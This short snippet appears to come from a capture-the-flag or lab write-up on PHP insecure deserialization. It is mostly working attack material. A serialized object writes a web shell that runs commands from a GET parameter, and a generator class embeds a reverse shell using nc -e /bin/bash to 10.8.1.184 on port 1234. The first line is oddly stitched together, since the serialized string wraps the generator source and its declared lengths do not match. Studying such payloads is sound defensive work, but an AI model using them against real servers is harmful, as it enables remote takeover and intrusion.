O:4:"file":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:30:"<?php system($_GET[\'cmd\']); ?>
<?php
class file
{
public $file = 'n.php';
public $data = '<?php shell_exec("nc -e /bin/bash 10.8.1.184 1234"); ?>';
}
echo (serialize(new file));
?>"
$ php original_payload.php > payload.txt
$ cat payload.txt
If unserialize() is used on untrusted data, and classes with __destruct() (or similar) exist, plus URL wrappers are enabled, attackers can exploit it to load remote resources or execute arbitrary code.